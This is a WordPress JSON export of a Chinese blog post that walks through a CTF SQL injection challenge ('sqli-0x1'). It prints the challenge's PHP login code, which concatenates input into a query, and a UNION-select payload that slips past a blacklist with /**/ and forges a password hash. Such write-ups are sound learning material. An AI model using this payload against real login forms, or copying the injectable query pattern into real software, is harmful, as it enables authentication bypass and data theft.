{"id":340,"date":"2023-11-01T13:46:22","date_gmt":"2023-11-01T05:46:22","guid":{"rendered":"http:\/\/danielw.top\/?p=340"},"modified":"2023-11-01T13:46:22","modified_gmt":"2023-11-01T05:46:22","slug":"sqli-0x1","status":"publish","type":"post","link":"http:\/\/danielw.top\/?p=340","title":{"rendered":"sqli-0x1"},"content":{"rendered":"<h1>sqli-0x1<\/h1>\n<h3>\u901a\u8fc7\u67e5\u770b\u9875\u9762\u6e90\u4ee3\u7801\u53d1\u73b0\u5e2e\u52a9<\/h3>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20231031171434890.png\" alt=\"image-20231031171434890\" \/><\/p>\n<h3>\u8bbf\u95ee<code>\/?pls_help<\/code>\u5f97\u5230\u6e90\u7801\uff0c\u5e76\u8fdb\u884c\u5206\u6790<\/h3>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nerror_log(0);\n\nrequire_once(&quot;flag.php&quot;);\n\nfunction is_trying_to_hak_me($str)\n{   \n    $blacklist = [&quot;&#039; &quot;, &quot; &#039;&quot;, &#039;&quot;&#039;, &quot;`&quot;, &quot; `&quot;, &quot;` &quot;, &quot;&gt;&quot;, &quot;&lt;&quot;];\n    if (strpos($str, &quot;&#039;&quot;) !== false) {   \/\/\u5982\u679c\u5b58\u5728&#039;\n        if (!preg_match(&quot;\/[0-9a-zA-Z]&#039;[0-9a-zA-Z]\/&quot;, $str)) {    \/\/\u5224\u65ad\u662f\u5426\u6ee1\u8db3\u6b63\u5219\u8868\u8fbe\u5f0f\uff0c\u5982\u679c\u662f\u5219\u8fd4\u56detrue\n            return true;\n        }\n    }\n    foreach ($blacklist as $token) {    \/\/\u67e5\u770b\u662f\u5426\u5b58\u5728\u7279\u6b8a\u5b57\u7b26\n        if (strpos($str, $token) !== false) return true;\n    }\n    return false;\n}\n\nif (isset($_GET[&quot;pls_help&quot;])) {\n    highlight_file(__FILE__);\n    exit;\n}\n\nif (isset($_POST[&quot;user&quot;]) &amp;&amp; isset($_POST[&quot;pass&quot;]) &amp;&amp; (!empty($_POST[&quot;user&quot;])) &amp;&amp; (!empty($_POST[&quot;pass&quot;]))) { \/\/user\u548cpass\u4e0d\u4e3a\u7a7a\n    $user = $_POST[&quot;user&quot;];\n    $pass = $_POST[&quot;pass&quot;];\n    if (is_trying_to_hak_me($user)) {\n        die(&quot;why u bully me&quot;);\n    }\n\n    $db = new SQLite3(&quot;\/var\/db.sqlite&quot;);\n    $result = $db-&gt;query(&quot;SELECT * FROM users WHERE username=&#039;$user&#039;&quot;);  \/\/SQL\u62fc\u63a5\u8bed\u53e5\n    if ($result === false) die(&quot;pls dont break me&quot;);\n    else $result = $result-&gt;fetchArray();\n\n    if ($result) { \n        $split = explode(&#039;$&#039;, $result[&quot;password&quot;]);\n        $password_hash = $split[0]; \/\/\u8fdb\u884chash\u8fd0\u7b97\n        $salt = $split[1];  \n        if ($password_hash === hash(&quot;sha256&quot;, $pass.$salt)) $logged_in = true;    \/\/\u5bf9\u6bd4hash\u662f\u5426\u76f8\u540c\uff0c\u5982\u679c\u76f8\u540c\u6253\u5370flag\n        else $err = &quot;Wrong password&quot;;\n    }\n    else $err = &quot;No such user&quot;;\n}\n?&gt;\n\n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n    &lt;title&gt;Hack.INI 9th - SQLi&lt;\/title&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;?php if (isset($logged_in) &amp;&amp; $logged_in): ?&gt;    \/\/\u5982\u679cligged_in\u5b58\u5728\u4e0d\u4e3aNULL\u4e14ligged_in\u503c\u4e3atrue\u5219\u8fd4\u56deflag\n    &lt;p&gt;Welcome back admin! Have a flag: &lt;?=htmlspecialchars($flag);?&gt;&lt;p&gt;\n    &lt;?php else: ?&gt;\n    &lt;form method=&quot;post&quot;&gt;\n        &lt;input type=&quot;text&quot; placeholder=&quot;Username&quot; name=&quot;user&quot; required&gt;\n        &lt;input type=&quot;password&quot; placeholder=&quot;Password&quot; name=&quot;pass&quot; required&gt;\n        &lt;button type=&quot;submit&quot;&gt;Login&lt;\/button&gt;\n        &lt;br&gt;&lt;br&gt;\n        &lt;?php if (isset($err)) echo $err; ?&gt;\n    &lt;\/form&gt;\n    &lt;?php endif; ?&gt;\n    &lt;!-- &lt;a href=&quot;\/?pls_help&quot;&gt;get some help&lt;\/a&gt; --&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<h3>\u901a\u8fc7\u5bf9\u4ee3\u7801\u7684\u5206\u6790\u901a\u8fc7\u4ee5\u4e0b\u4ee3\u7801\u751f\u6210pass<\/h3>\n<pre><code class=\"language-php\">&lt;?php  \n    var_dump(hash(&quot;sha256&quot;,1.1));\n?&gt;\n\n\/\/\u5f97\u5230\uff1astring(64)&quot;4fc82b26aecb47d2868c4efbe3581732a3e7cbcc6c2efb32062c08170a05eeb8&quot;<\/code><\/pre>\n<p>\u7531\u4e8e\u767b\u9646\u903b\u8f91\u662f\u4ee5 $ \u5bf9\u5bc6\u7801\u8fdb\u884c\u5206\u5272\u4ee5\u5212\u5206 Hash \u548c Salt \u7684\uff0c\u6545payload\u4e3a\uff1a<\/p>\n<pre><code class=\"language-sql\">4fc82b26aecb47d2868c4efbe3581732a3e7cbcc6c2efb32062c08170a05eeb8$1\n\nUsername\uff1a1&#039;union\/**\/select\/**\/1,&#039;4fc82b26aecb47d2868c4efbe3581732a3e7cbcc6c2efb32062c08170a05eeb8$1\nPassword\uff1a1\n\nSELECT * FROM users WHERE username=&#039;1&#039;union\/**\/select\/**\/1,&#039;4fc82b26aecb47d2868c4efbe3581732a3e7cbcc6c2efb32062c08170a05eeb8$1&#039;<\/code><\/pre>\n<p>\u5f97\u5230flag<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20231031172021130.png\" alt=\"image-20231031172021130\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>sqli-0x1 \u901a\u8fc7\u67e5\u770b\u9875\u9762\u6e90\u4ee3\u7801\u53d1\u73b0\u5e2e\u52a9 \u8bbf\u95ee\/?pls_help\u5f97\u5230\u6e90\u7801\uff0c\u5e76\u8fdb\u884c\u5206\u6790 &lt;?php error_repo &#8230;<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-340","post","type-post","status-publish","format-standard","hentry","category-9"],"_links":{"self":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/340","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=340"}],"version-history":[{"count":1,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/340\/revisions"}],"predecessor-version":[{"id":341,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/340\/revisions\/341"}],"wp:attachment":[{"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=340"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=340"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=340"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}